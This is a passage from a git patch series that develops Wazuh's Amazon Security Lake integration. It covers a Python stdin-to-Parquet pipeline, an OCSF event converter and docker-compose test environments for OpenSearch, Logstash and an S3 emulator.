-  current_time = datetime.now(tz='UTC')  
+  current_time = datetime.datetime.now(datetime.timezone.utc)  
   return (current_time - reference_timestamp).total_seconds()
   
-def parse_arguments():
+
+if __name__ == "__main__":
+  clock = datetime.datetime.now(datetime.timezone.utc)
+  clockstr = clock.strftime('%F_%H.%M.%S')
   parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline')
   parser.add_argument('-b','--bucketname', action='store', help='Name of the output S3 bucket')
   parser.add_argument('-f','--foldername', action='store', help='Name of the output S3 bucket\'s folder')
-  parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval for pushing data to Security Lake')
+  parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval in seconds for pushing data to Security Lake')
   parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake')
   parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length')
   parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval')
   parser.add_argument('-v','--ocsfschema', action='store', default='1.1.0', help='Version of the OCSF schema to use')
   parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', help='Location of the Wazuh Alert to OCSF mapping (json formatted)')
-  debugging = parser.add_argument_group('debugging')
-  debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to')
-  debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging')
+  parser.add_argument('-o','--output', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to')
+  parser.add_argument('-d','--debug', action='store_true', help='Activate debugging')
   args = parser.parse_args()
-
-if __name__ == "__main__":
-  clock = datetime.now(tz='UTC')
-  clockstr = clock.strftime('%F_%H.%M.%S')
-  parse_arguments()
-  logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG)
+  logging.basicConfig(format='%(asctime)s %(message)s', filename=args.output, encoding='utf-8', level=logging.DEBUG)
   logging.info('BUFFERING STDIN')
   
   try: 
-    with open(ocsf_mapping_filename) as jsonfile:
-      mappings = json.loads(jsonfile.read())
+    #with open(ocsf_mapping_filename) as jsonfile:
+    #  mappings = json.loads(jsonfile.read())
 
-    with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin:
+    with os.fdopen(sys.stdin.fileno(), 'rt') as stdin:
       output_buffer = []
-      starttimestamp = datetime.now(tz='UTC')
+      starttimestamp = datetime.datetime.now(datetime.timezone.utc)
       
       try:
         while True:
@@ -98,14 +95,14 @@ def parse_arguments():
           ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas
           ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory
 
-          current_block = map_block(stdin, args.linebuffer, mappings,args.ocsfschema)
+          current_block = map_block(stdin, args.linebuffer )
           if current_block[-1] == block_ending :
             output_buffer +=  current_block[0:current_block.index(block_ending)]
             time.sleep(args.sleeptime)
           if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval:
             encode_parquet(output_buffer,args.bucketname,args.foldername)
             logging.debug(json.dumps(output_buffer))
-            starttimestamp = datetime.now(tz='UTC')
+            starttimestamp = datetime.datetime.now(datetime.timezone.utc)
             output_buffer = []
           output_buffer.append(current_block)
 
@@ -117,4 +114,6 @@ def parse_arguments():
 
   except Exception as e:
     logging.error("Error running script")
+    logging.error(e)
+    raise
     exit(1)

From 7fd25d1213e605ceac965eb3eb31395c05072b3f Mon Sep 17 00:00:00 2001
From: Fede Tux <federico.galland@wazuh.com>
Date: Fri, 16 Feb 2024 15:28:51 -0300
Subject: [PATCH 19/34] Code polish and fix errors

---
 .../amazon-security-lake/ocsf/converter.py    | 152 +++++++++---------
 .../stdin_to_securitylake.py                  |  87 +++-------
 2 files changed, 102 insertions(+), 137 deletions(-)

diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py
index 2a14b75957c97..c927afa8fe87f 100644
--- a/integrations/amazon-security-lake/ocsf/converter.py
+++ b/integrations/amazon-security-lake/ocsf/converter.py
@@ -1,87 +1,89 @@
-#!/usr/bin/python
+#!/usr/bin/python3
 
 # event comes from Filebeat
-event = {}
-
+#event = {}
+#print(event)
 
 def normalize(level: int) -> int:
-    """
-    Normalizes rule level into the 0-6 range, required by OCSF.
-    """
-    # TODO normalization
-    return level
+  """
+  Normalizes rule level into the 0-6 range, required by OCSF.
+  """
+  # TODO normalization
+  return level
 
 
 def join(iterable, separator=","):
-    return (separator.join(iterable))
+  return (separator.join(iterable))
 
 
 def convert(event: dict) -> dict:
-    """
-    Converts Wazuh events to OCSF's Detecting Finding (2004) class.
-    """
-    ocsf_class_template = \
+  """
+  Converts Wazuh events to OCSF's Detecting Finding (2004) class.
+  """
+  ocsf_class_template = \
+    {
+      "activity_id": 1,
+      "category_name": "Findings",
+      "category_uid": 2,
+      "class_name": "Detection Finding",
+      "class_uid": 2004,
+      "count": event["_source"]["rule"]["firedtimes"],
+      "message": event["_source"]["rule"]["description"],
+      "finding_info": {
+        "analytic": {
+          "category": join(event["_source"]["rule"]["groups"]),
+          "name": event["_source"]["decoder"]["name"],
+          "type_id": 1,
+          "uid": event["_source"]["rule"]["id"],
+        },
+        "attacks": {
+          "tactic": {
+            #"name": join(event["_source"]["rule"]["mitre"]["tactic"]),
+            "dummy": True
+          },
+          "technique": {
+            #"name": join(event["_source"]["rule"]["mitre"]["technique"]),
+            #"uid": join(event["_source"]["rule"]["mitre"]["id"]),
+            "dummy": True
+          },
+          "version": "v13.1"
+        },
+        "title": event["_source"]["rule"]["description"],
+        "types": [
+          event["_source"]["input"]["type"]
+        ],
+        "uid": event["_source"]['id']
+      },
+      "metadata": {
+        "log_name": "Security events",
+        "log_provider": "Wazuh",
+        "product": {
+          "name": "Wazuh",
+          "lang": "en",
+          "vendor_name": "Wazuh, Inc,."
+        },
+        "version": "1.1.0",
+      },
+      #"raw_data": event["_source"]["full_log"],
+      "resources": [
         {
-            "activity_id": 1,
-            "category_name": "Findings",
-            "category_uid": 2,
-            "class_name": "Detection Finding",
-            "class_uid": 2004,
-            "count": event["rule"]["firedtimes"],
-            "message": event["rule"]["description"],
-            "finding_info": {
-                "analytic": {
-                    "category": join(event["rule"]["groups"]),
-                    "name": event["decoder"]["name"],
-                    "type_id": 1,
-                    "uid": event["rule"]["id"],
-                },
-                "attacks": {
-                    "tactic": {
-                        "name": join(event["rule"]["mitre"]["tactic"]),
-                    },
-                    "technique": {
-                        "name": join(event["rule"]["mitre"]["technique"]),
-                        "uid": join(event["rule"]["mitre"]["id"]),
-                    },
-                    "version": "v13.1"
-                },
-                "title": event["rule"]["description"],
-                "types": [
-                    event["input"]["type"]
-                ],
-                "uid": event['id']
-            },
-            "metadata": {
-                "log_name": "Security events",
-                "log_provider": "Wazuh",
-                "product": {
-                    "name": "Wazuh",
-                    "lang": "en",
-                    "vendor_name": "Wazuh, Inc,."
-                },
-                "version": "1.1.0",
-            },
-            "raw_data": event["full_log"],
-            "resources": [
-                {
-                    "name": event["agent"]["name"],
-                    "uid": event["agent"]["id"]
-                },
-            ],
-            "risk_score": event["rule"]["level"],
-            "severity_id": normalize(event["rule"]["level"]),
-            "status_id": 99,
-            "time": event["timestamp"],
-            "type_uid": 200401,
-            "unmapped": {
-                "data_sources": [
-                    event["_index"],
-                    event["location"],
-                    event["manager"]["name"]
-                ],
-                "nist": event["rule"]["nist_800_53"],  # Array
-            }
-        }
+          "name": event["_source"]["agent"]["name"],
+          "uid": event["_source"]["agent"]["id"]
+        },
+      ],
+      "risk_score": event["_source"]["rule"]["level"],
+      "severity_id": normalize(event["_source"]["rule"]["level"]),
+      "status_id": 99,
+      "time": event["_source"]["timestamp"],
+      "type_uid": 200401,
+      "unmapped": {
+        "data_sources": [
+          #event["_source"]["_index"],
+          event["_source"]["location"],
+          event["_source"]["manager"]["name"]
+        ],
+        #"nist": event["_source"]["rule"]["nist_800_53"],  # Array
+      }
+    }
 
-    return ocsf_class_template
+  return ocsf_class_template
diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py
index 49926a8aa1d64..4fdecc14c073e 100755
--- a/integrations/amazon-security-lake/stdin_to_securitylake.py
+++ b/integrations/amazon-security-lake/stdin_to_securitylake.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python3
+#!/src/wazuh-indexer/integrations/amazon-security-lake/bin/python3
 
 import os
 import sys
@@ -7,44 +7,18 @@
 import time
 import json
 import datetime
-from pyarrow import parquet, Table, fs
-
+from pyarrow import parquet, Table
 from ocsf import converter
 
 block_ending = { "block_ending": True }
 
-s3 = fs.S3FileSystem()
-
-#def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema):
-#  ocsf_output = {}
-#  ### Put constants into the output alert
-#  ocsf_output |= mappings[ocsfschema]['constants']
-#
-#  for key in mappings[ocsfschema]['mappings']:
-#    dotted_destination_field = mappings[ocsfschema]['mappings'].get(key)
-#    depth_levels = dotted_destination.split('.')
-#    current_level = alert_dictionary[depth_levels[0]]
-#    if len(depth_levels>1):
-#      for field in depth_levels[1:]:
-#        current_level = current_level[field]
-#    ocsf_output[key] = current_level
-#  ### We probably need to crop the fields we already
-#  ### mapped to OCSF from ocsf_output
-#  ocsf_output['unmapped'] = alert_dictionary
-
-def encode_parquet(list,bucket_name,folder):
-  ### We can write directly to S3 from pyarrow:
-  ### https://arrow.apache.org/docs/python/filesystems.html#s3
-  ### https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream
-  ###
-  ### Credentials can be stored in ~/.aws/credentials
-  ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html
-
+def encode_parquet(list,foldername,filename):
   table = Table.from_pylist(list)
-  parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name, folder))
+  parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename))
 
 def map_block(fileobject, length):
   output=[]
+  ocsf_mapped_alert = {}
   for line in range(0, length):
     line = fileobject.readline()
     if line == '':
@@ -52,36 +26,28 @@ def map_block(fileobject, length):
       break 
     alert = json.loads(line)
     ocsf_mapped_alert = converter.convert(alert)
-    #map_to_ocsf(alert, mappings, ocsf_mapped_alert):
-  output.append(ocsf_mapped_alert)
+    output.append(ocsf_mapped_alert)
   return output
 
 def get_elapsedseconds(reference_timestamp):
   current_time = datetime.datetime.now(datetime.timezone.utc)  
   return (current_time - reference_timestamp).total_seconds()
-  
 
 if __name__ == "__main__":
-  clock = datetime.datetime.now(datetime.timezone.utc)
-  clockstr = clock.strftime('%F_%H.%M.%S')
+  date = datetime.datetime.now(datetime.timezone.utc).strftime('%F_%H.%M.%S')
   parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline')
-  parser.add_argument('-b','--bucketname', action='store', help='Name of the output S3 bucket')
-  parser.add_argument('-f','--foldername', action='store', help='Name of the output S3 bucket\'s folder')
-  parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval in seconds for pushing data to Security Lake')
-  parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake')
-  parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length')
-  parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval')
-  parser.add_argument('-v','--ocsfschema', action='store', default='1.1.0', help='Version of the OCSF schema to use')
-  parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', help='Location of the Wazuh Alert to OCSF mapping (json formatted)')
-  parser.add_argument('-o','--output', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to')
-  parser.add_argument('-d','--debug', action='store_true', help='Activate debugging')
+  parser.add_argument('-d','--debug', type=bool, action='store_true', help='Activate debugging')
+  parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake')
+  parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to')
+  parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake')
+  parser.add_argument('-n','--linebuffer', type=int, action='store', default=100, help='stdin line buffer length')
+  parser.add_argument('-o','--outputfolder', type=str, action='store', help='Folder or S3 bucket URL to dump parquet files to')
+  parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval')
   args = parser.parse_args()
-  logging.basicConfig(format='%(asctime)s %(message)s', filename=args.output, encoding='utf-8', level=logging.DEBUG)
+  logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG)
   logging.info('BUFFERING STDIN')
   
   try: 
-    #with open(ocsf_mapping_filename) as jsonfile:
-    #  mappings = json.loads(jsonfile.read())
 
     with os.fdopen(sys.stdin.fileno(), 'rt') as stdin:
       output_buffer = []
@@ -89,22 +55,20 @@ def get_elapsedseconds(reference_timestamp):
       
       try:
         while True:
-          ### We can possibly replace all the custom code here
-          ### and just use Arrow's built-in input and output facilities:
-          ### * https://arrow.apache.org/docs/python/memory.html#input-and-output
-          ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas
-          ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory
-
-          current_block = map_block(stdin, args.linebuffer )
-          if current_block[-1] == block_ending :
-            output_buffer +=  current_block[0:current_block.index(block_ending)]
-            time.sleep(args.sleeptime)
+          
           if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval:
-            encode_parquet(output_buffer,args.bucketname,args.foldername)
+            encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date))
             logging.debug(json.dumps(output_buffer))
             starttimestamp = datetime.datetime.now(datetime.timezone.utc)
             output_buffer = []
-          output_buffer.append(current_block)
+
+          current_block = map_block( stdin, args.linebuffer )
+
+          if current_block[-1] == block_ending:
+            output_buffer +=  current_block[0:-1]
+            time.sleep(args.sleeptime)
+          else:
+            output_buffer +=  current_block
 
       except KeyboardInterrupt:
         logging.info("Keyboard Interrupt issued")
@@ -116,4 +80,3 @@ def get_elapsedseconds(reference_timestamp):
     logging.error("Error running script")
     logging.error(e)
     raise
-    exit(1)

From e06203c32c3bbac39639abe4ff8819ed90663e7e Mon Sep 17 00:00:00 2001
From: Fede Tux <federico.galland@wazuh.com>
Date: Fri, 16 Feb 2024 15:38:53 -0300
Subject: [PATCH 20/34] Remove unnecessary type declaration from debug flag

---
 integrations/amazon-security-lake/stdin_to_securitylake.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py
index 4fdecc14c073e..b8fa6c17bbf4c 100755
--- a/integrations/amazon-security-lake/stdin_to_securitylake.py
+++ b/integrations/amazon-security-lake/stdin_to_securitylake.py
@@ -36,7 +36,7 @@ def get_elapsedseconds(reference_timestamp):
 if __name__ == "__main__":
   date = datetime.datetime.now(datetime.timezone.utc).strftime('%F_%H.%M.%S')
   parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline')
-  parser.add_argument('-d','--debug', type=bool, action='store_true', help='Activate debugging')
+  parser.add_argument('-d','--debug', action='store_true', help='Activate debugging')
   parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake')
   parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to')
   parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake')

From 6826e127a60ef34551349dff86a0a6cc11816637 Mon Sep 17 00:00:00 2001
From: Fede Tux <federico.galland@wazuh.com>
Date: Fri, 16 Feb 2024 17:00:15 -0300
Subject: [PATCH 21/34] Improved parquet encoding

---
 .../stdin_to_securitylake.py                  | 29 ++++++++++++-------
 1 file changed, 19 insertions(+), 10 deletions(-)

diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py
index b8fa6c17bbf4c..ec90025d9afa3 100755
--- a/integrations/amazon-security-lake/stdin_to_securitylake.py
+++ b/integrations/amazon-security-lake/stdin_to_securitylake.py
@@ -1,4 +1,4 @@
-#!/src/wazuh-indexer/integrations/amazon-security-lake/bin/python3
+#!/home/fede/src/wazuh-indexer/integrations/amazon-security-lake/venv/bin/python3
 
 import os
 import sys
@@ -13,8 +13,13 @@
 block_ending = { "block_ending": True }
 
 def encode_parquet(list,foldername,filename):
-  table = Table.from_pylist(list)
-  parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename))
+  try:
+    table = Table.from_pylist(list)
+    print(table)
+    parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename))
+  except Exception as e:
+    logging.error(e)
+    raise
 
 def map_block(fileobject, length):
   output=[]
@@ -44,7 +49,8 @@ def get_elapsedseconds(reference_timestamp):
   parser.add_argument('-o','--outputfolder', type=str, action='store', help='Folder or S3 bucket URL to dump parquet files to')
   parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval')
   args = parser.parse_args()
-  logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG)
+  #logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG)
+  logging.basicConfig(format='%(asctime)s %(message)s', encoding='utf-8', level=logging.DEBUG)
   logging.info('BUFFERING STDIN')
   
   try: 
@@ -55,12 +61,6 @@ def get_elapsedseconds(reference_timestamp):
       
       try:
         while True:
-          
-          if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval:
-            encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date))
-            logging.debug(json.dumps(output_buffer))
-            starttimestamp = datetime.datetime.now(datetime.timezone.utc)
-            output_buffer = []
 
           current_block = map_block( stdin, args.linebuffer )
 
@@ -70,6 +70,15 @@ def get_elapsedseconds(reference_timestamp):
           else:
             output_buffer +=  current_block
 
+          if len(output_buffer) == 0:
+            continue
+
+          if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval:
+            logging.info('Writing data to parquet file')
+            encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date))
+            starttimestamp = datetime.datetime.now(datetime.timezone.utc)
+            output_buffer = []
+
       except KeyboardInterrupt:
         logging.info("Keyboard Interrupt issued")
         exit(0)

From 9cfc24786cd96d6c4f239e3d4e64db0475299c12 Mon Sep 17 00:00:00 2001
From: Fede Tux <federico.galland@wazuh.com>
Date: Mon, 19 Feb 2024 15:38:04 -0300
Subject: [PATCH 22/34] Initial commit for test env's docker-compose.yml

---
 .../stdin_to_securitylake.py                  |   1 -
 integrations/docker/docker-compose.yml        | 117 ++++++++++++++++++
 2 files changed, 117 insertions(+), 1 deletion(-)
 create mode 100644 integrations/docker/docker-compose.yml

diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py
index ec90025d9afa3..eee82036c3ff5 100755
--- a/integrations/amazon-security-lake/stdin_to_securitylake.py
+++ b/integrations/amazon-security-lake/stdin_to_securitylake.py
@@ -15,7 +15,6 @@
 def encode_parquet(list,foldername,filename):
   try:
     table = Table.from_pylist(list)
-    print(table)
     parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename))
   except Exception as e:
     logging.error(e)
diff --git a/integrations/docker/docker-compose.yml b/integrations/docker/docker-compose.yml
new file mode 100644
index 0000000000000..ebd6b348c5116
--- /dev/null
+++ b/integrations/docker/docker-compose.yml
@@ -0,0 +1,117 @@
+version: "3.8"
+
+services:
+
+  events-generator:
+    image: events-generator
+    build:
+      dockerfile_inline: |
+        FROM ubuntu:20.04
+        RUN apt update && apt install -y python3-requests
+    container_name: events-generator
+    volumes:
+      - ../tools/events-generator:/home/events-generator
+    hostname: events-generator
+    working_dir: "/home/events-generator"
+    entrypoint: sh -c "python3 run.py"
+    networks:
+      wazuh-indexer-dev:
+        aliases:
+          - events-generator
+        ipv4_address: 172.18.0.2
+    depends_on:
+      - wazuh-indexer
+  
+  wazuh-indexer:
+    image: wazuh/wazuh-indexer:4.8.0-beta1
+    container_name: wazuh-indexer
+    hostname: wazuh-indexer
+    restart: always
+    networks:
+      wazuh-indexer-dev:
+        aliases:
+          - wazuh-indexer
+        ipv4_address: 172.18.0.3
+    ports:
+      - "9222:9200"
+    depends_on:
+      - generator
+    environment:
+      - "OPENSEARCH_JAVA_OPTS=-Xms1g -Xmx1g"
+      - "bootstrap.memory_lock=true"
+      - 'INDEXER_PASSWORD=SecretPassword'
+    ulimits:
+      memlock:
+        soft: -1
+        hard: -1
+      nofile:
+        soft: 65536
+        hard: 65536
+    volumes:
+      - ./wazuh-indexer-data:/var/lib/wazuh-indexer
+      - ./config/wazuh_indexer_ssl_certs/root-ca.pem:/usr/share/wazuh-indexer/certs/root-ca.pem
+      - ./config/wazuh_indexer_ssl_certs/wazuh1.indexer-key.pem:/usr/share/wazuh-indexer/certs/wazuh1.indexer.key
+      - ./config/wazuh_indexer_ssl_certs/wazuh1.indexer.pem:/usr/share/wazuh-indexer/certs/wazuh1.indexer.pem
+      - ./config/wazuh_indexer_ssl_certs/admin.pem:/usr/share/wazuh-indexer/certs/admin.pem
+      - ./config/wazuh_indexer_ssl_certs/admin-key.pem:/usr/share/wazuh-indexer/certs/admin-key.pem
+      - ./config/wazuh_indexer/wazuh1.indexer.yml:/usr/share/wazuh-indexer/opensearch.yml
+      - ./config/wazuh_indexer/internal_users.yml:/usr/share/wazuh-indexer/opensearch-security/internal_users.yml
+
+  generator:
+    image: wazuh/wazuh-certs-generator:0.0.1
+    hostname: wazuh-certs-generator
+    volumes:
+      - ./config/wazuh_indexer_ssl_certs/:/certificates/
+      - ./config/certs.yml:/config/certs.yml
+    environment:
+      - HTTP_PROXY=YOUR_PROXY_ADDRESS_OR_DNS
+  
+  logstash:
+    image: logstash
+    build:
+      dockerfile_inline: |
+        FROM ubuntu:20.04
+        RUN apt update && apt install -y iputils-ping wget gpg apt-transport-https
+        WORKDIR /home/logstash
+        RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \
+            echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-8.x.list && \
+            apt update && \
+            apt install -y logstash && \
+            chown -R logstash:logstash /etc/logstash && \
+            chown logstash:logstash /home/logstash
+    entrypoint: /usr/share/bin/logstash --path.settings /etc/logstash --config.reload.automatic
+    container_name: logstash
+    hostname: logstash
+    user: logstash
+    volumes:
+      - ../amazon-security-lake:/home/logstash
+      - ../amazon-security-lake/logstash/pipe-output.conf:/etc/logstash/conf.d/pipe-output.conf
+      - ../amazon-security-lake/logstash/pipelines.yml:/etc/logstash/pipelines.yml
+    networks:
+      wazuh-indexer-dev:
+        aliases:
+          - logstash
+        ipv4_address: 172.18.0.4
+    depends_on:
+      - wazuh-indexer
+      - s3-ninja
+  
+  s3-ninja:
+    image: scireum/s3-ninja
+    container_name: s3-ninja
+    hostname: s3-ninja
+    volumes:
+      - ./s3-ninja_data:/home/sirius/data
+    networks:
+      wazuh-indexer-dev:
+        aliases:
+          - s3-ninja
+        ipv4_address: 172.18.0.5
+    ports:
+      - "9444:9000"
+
+networks:
+  wazuh-indexer-dev:
+    ipam:
+      config:
+        - subnet: "172.18.0.0/16"

From 324d1f5033871722a60c4b1b54ac16b9bee5eb6e Mon Sep 17 00:00:00 2001
From: Fede Tux <federico.galland@wazuh.com>
Date: Mon, 19 Feb 2024 16:52:36 -0300
Subject: [PATCH 23/34] Remove sudo references from docker-compose.yml

---
 integrations/docker/docker-compose.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/integrations/docker/docker-compose.yml b/integrations/docker/docker-compose.yml
index ebd6b348c5116..dd7f12f119e05 100644
--- a/integrations/docker/docker-compose.yml
+++ b/integrations/docker/docker-compose.yml
@@ -73,8 +73,8 @@ services:
         FROM ubuntu:20.04
         RUN apt update && apt install -y iputils-ping wget gpg apt-transport-https
         WORKDIR /home/logstash
-        RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \
-            echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-8.x.list && \
+        RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \
+            echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | tee -a /etc/apt/sources.list.d/elastic-8.x.list && \
             apt update && \
             apt install -y logstash && \
             chown -R logstash:logstash /etc/logstash && \

From cb5ac7321bea365f46965b8bb5fa1359991422ac Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=81lex=20Ruiz?= <alejandro.ruiz.becerra@wazuh.com>
Date: Wed, 21 Feb 2024 16:34:34 +0100
Subject: [PATCH 24/34] Add operational Python module to transform events to
 OCSF

---
 .../amazon-security-lake/docker-compose.yml   |  67 +++++++++++
 .../logstash/{ => pipeline}/pipe-output.conf  |  11 +-
 .../logstash/{ => pipeline}/wazuh-s3.conf     |   0
 .../amazon-security-lake/logstash/setup.sh    |  15 +++
 .../amazon-security-lake/ocsf/__init__.py     |   2 -
 .../amazon-security-lake/ocsf/converter.py    |  89 --------------
 .../ocsf/wazuh-event.sample.json              |  90 --------------
 .../amazon-security-lake/requirements.txt     |   3 +-
 integrations/amazon-security-lake/run.py      |  34 ++++++
 .../stdin_to_securitylake.py                  |   5 +-
 .../transform/__init__.py                     |   1 +
 .../transform/converter.py                    | 112 ++++++++++++++++++
 .../transform/legacy/legacy_converter.py      |  87 ++++++++++++++
 .../legacy/legacy_test.py}                    |  10 +-
 .../transform/models/__init__.py              |   2 +
 .../transform/models/ocsf.py                  |  66 +++++++++++
 .../transform/models/wazuh.py                 |  50 ++++++++
 .../wazuh-event.sample.json                   |  76 ++++++++++++
 18 files changed, 525 insertions(+), 195 deletions(-)
 create mode 100644 integrations/amazon-security-lake/docker-compose.yml
 rename integrations/amazon-security-lake/logstash/{ => pipeline}/pipe-output.conf (69%)
 rename integrations/amazon-security-lake/logstash/{ => pipeline}/wazuh-s3.conf (100%)
 create mode 100644 integrations/amazon-security-lake/logstash/setup.sh
 delete mode 100644 integrations/amazon-security-lake/ocsf/__init__.py
 delete mode 100644 integrations/amazon-security-lake/ocsf/converter.py
 delete mode 100644 integrations/amazon-security-lake/ocsf/wazuh-event.sample.json
 create mode 100644 integrations/amazon-security-lake/run.py
 create mode 100644 integrations/amazon-security-lake/transform/__init__.py
 create mode 100644 integrations/amazon-security-lake/transform/converter.py
 create mode 100644 integrations/amazon-security-lake/transform/legacy/legacy_converter.py
 rename integrations/amazon-security-lake/{ocsf/test.py => transform/legacy/legacy_test.py} (57%)
 create mode 100644 integrations/amazon-security-lake/transform/models/__init__.py
 create mode 100644 integrations/amazon-security-lake/transform/models/ocsf.py
 create mode 100644 integrations/amazon-security-lake/transform/models/wazuh.py
 create mode 100644 integrations/amazon-security-lake/wazuh-event.sample.json

diff --git a/integrations/amazon-security-lake/docker-compose.yml b/integrations/amazon-security-lake/docker-compose.yml
new file mode 100644
index 0000000000000..6c5c1c21445c9
--- /dev/null
+++ b/integrations/amazon-security-lake/docker-compose.yml
@@ -0,0 +1,67 @@
+version: '3'
+services:
+  opensearch-node:
+    image: opensearchproject/opensearch:latest # This should be the same image used for opensearch-node1 to avoid issues
+    container_name: opensearch-node
+    environment:
+      - cluster.name=opensearch-cluster
+      - node.name=opensearch-node
+      - discovery.seed_hosts=opensearch-node
+      - cluster.initial_cluster_manager_nodes=opensearch-node
+      - bootstrap.memory_lock=true
+      - "OPENSEARCH_JAVA_OPTS=-Xms512m -Xmx512m"
+    ulimits:
+      memlock:
+        soft: -1
+        hard: -1
+      nofile:
+        soft: 65536
+        hard: 65536
+    volumes:
+      - opensearch-data:/usr/share/opensearch/data
+    networks:
+      - opensearch-net
+  opensearch-dashboards:
+    image: opensearchproject/opensearch-dashboards:latest # Make sure the version of opensearch-dashboards matches the version of opensearch installed on other nodes
+    container_name: opensearch-dashboards
+    ports:
+      - 5601:5601 # Map host port 5601 to container port 5601
+    expose:
+      - "5601" # Expose port 5601 for web access to OpenSearch Dashboards
+    environment:
+      OPENSEARCH_HOSTS: '["https://opensearch-node:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query
+    networks:
+      - opensearch-net
+  logstash:
+    build:
+      context: .
+      dockerfile_inline: |
+        FROM logstash:8.12.1
+
+        COPY --chown=logstash:logstash logstash/setup.sh /usr/share/logstash/bin/setup.sh
+        COPY --chown=logstash:logstash logstash/pipeline/pipe-output.conf /usr/share/logstash/pipeline/pipe-output.config
+       
+        RUN bash /usr/share/logstash/bin/setup.sh
+        RUN /usr/share/logstash/bin/logstash-plugin install logstash-input-opensearch
+    container_name: logstash
+    environment:
+      LOG_LEVEL: trace
+      LOGSTASH_KEYSTORE_PASS: "SecretPassword"
+      MONITORING_ENABLED: false
+    ports:
+      - "5000:5000/tcp"
+      - "5000:5000/udp"
+      - "5044:5044"
+      - "9600:9600"
+    depends_on:
+      - opensearch-node
+    networks:
+      - opensearch-net
